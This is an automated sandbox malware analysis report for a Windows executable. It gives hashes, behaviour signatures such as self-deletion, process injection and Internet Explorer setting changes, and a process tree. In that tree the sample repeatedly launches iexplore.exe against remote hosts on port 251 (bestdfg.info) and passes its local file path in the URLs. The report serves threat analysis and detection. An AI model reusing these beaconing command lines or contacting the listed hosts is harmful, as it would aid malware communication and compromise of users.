Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
110s -
max time network
164s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
19/09/2022, 06:29
General
-
Target
7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe
-
Size
106KB
-
MD5
eb924181cc26ea4bf4e9b6e367085f60
-
SHA1
88e329693c1f1536a00ae6df3e2820483c408408
-
SHA256
7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628
-
SHA512
a2b15d724e6cbc8fa05787d61514764bb240dc9bdb17779b4b3939588978a537e148bb23e328766acd0514c459792bf0ece81dd3aa39d8bc9c7f08a2d0ac3284
-
SSDEEP
3072:xZMJnTeM4cJJLILa77j2NZmOSyt+DDMuzWtVhUxxW:/eTeM/vILI8Z2yQ/MGWcxc
Malware Config
Signatures
-
Deletes itself 1 IoCs
-
Loads dropped DLL 7 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 49 IoCs
-
Suspicious use of FindShellTrayWindow 12 IoCs
-
Suspicious use of SetWindowsHookEx 50 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe"C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dsdc.bestdfg.info:251/?t=919&i=ie&d8b27608ecd4b72d52ed7ab31a7a63916e0bce87=d8b27608ecd4b72d52ed7ab31a7a63916e0bce87&uu=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dsdc.bestdfg.info:251/?t=919&i=ie&d8b27608ecd4b72d52ed7ab31a7a63916e0bce87=d8b27608ecd4b72d52ed7ab31a7a63916e0bce87&uu=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:275460 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:603152 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:668693 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:4076560 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:209960 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:1258524 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1352 CREDAT:1586224 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a1&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a1&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a2&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a2&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a3&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a3&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a4&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a4&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a5&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a5&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a6&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a6&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a7&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a7&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a8&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a8&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a9&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a9&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a10&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a10&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.bestdfg.info:251/gagagaga.php?gg=a11&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce872⤵
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.bestdfg.info:251/gagagaga.php?gg=a11&tt=919&ur=C:\Users\Admin\AppData\Local\Temp\7e46673989b0bbe2c94c102385510443366604b87a79c2cd38a6a721b3a11628&d8b27608ecd4b72d52ed7ab31a7a63916e0bce873⤵
-
-
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe2⤵
- Deletes itself
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
608B
MD5343b3b19caa28682a0b1f99e2ae7d180
SHA17001d8f5b051756a6e1c6b4c8a3764d2c25e96d7
SHA256320e9122a9fd380eccdbb4cfb67befda3b746d409a26ef301e050945f3300dc9
SHA5124fe46905bc9f54e9955853a08c99044643db23f3c9cb952b5c75bd2fb60110e9f9f8ea2ef7e4ec7bab01d5f4ec6b910560f0735d1f7074f493b9d93fec9768dc
-
Filesize
18KB
MD5994669c5737b25c26642c94180e92fa2
SHA1d8a1836914a446b0e06881ce1be8631554adafde
SHA256bf01a1f272e0daf82df3407690b646e0ff6b2c562e36e47cf177eda71ccb6f6c
SHA512d0ab7ca7f890ef9e59015c33e6b400a0a4d1ce0d24599537e09e845f4b953e3ecd44bf3e3cbe584f57c2948743e689ed67d2d40e6caf923bd630886e89c38563
-
Filesize
66KB
MD59eb6cecdd0df9fe32027fcdb51c625af
SHA152b5b054ff6e7325c3087822901ea2f2c4f9572a
SHA25654cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560
SHA512864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a
-
Filesize
4KB
MD55e14f6774c43bdff6ffe0afb0d51c47f
SHA1fb1e7b6e63afa6db6aa2033b5e7e90f1f4ba5e27
SHA2567cb51ccf21655e9590a6c3232920b16a3dfef15ffe9df7b8e71f487ca8c24da9
SHA5126ac533c0485156a68bd1460d8219acf7539b766590910cd646f4d7d4572c072f45369712d88d4e698f4e94aead8082abcbfacc3d6fe890046898f6c6d85274e3
-
Filesize
11KB
MD500a0194c20ee912257df53bfe258ee4a
SHA1d7b4e319bc5119024690dc8230b9cc919b1b86b2
SHA256dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3
SHA5123b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667
-
Filesize
20KB
MD550fdadda3e993688401f6f1108fabdb4
SHA104a9ae55d0fb726be49809582cea41d75bf22a9a
SHA2566d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6
SHA512e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8
-
Filesize
20KB
MD550fdadda3e993688401f6f1108fabdb4
SHA104a9ae55d0fb726be49809582cea41d75bf22a9a
SHA2566d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6
SHA512e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8
-
Filesize
10KB
MD538977533750fe69979b2c2ac801f96e6
SHA174643c30cda909e649722ed0c7f267903558e92a
SHA256b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35
SHA512e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53
-
Filesize
8KB
-
Filesize
104KB
-
Filesize
8KB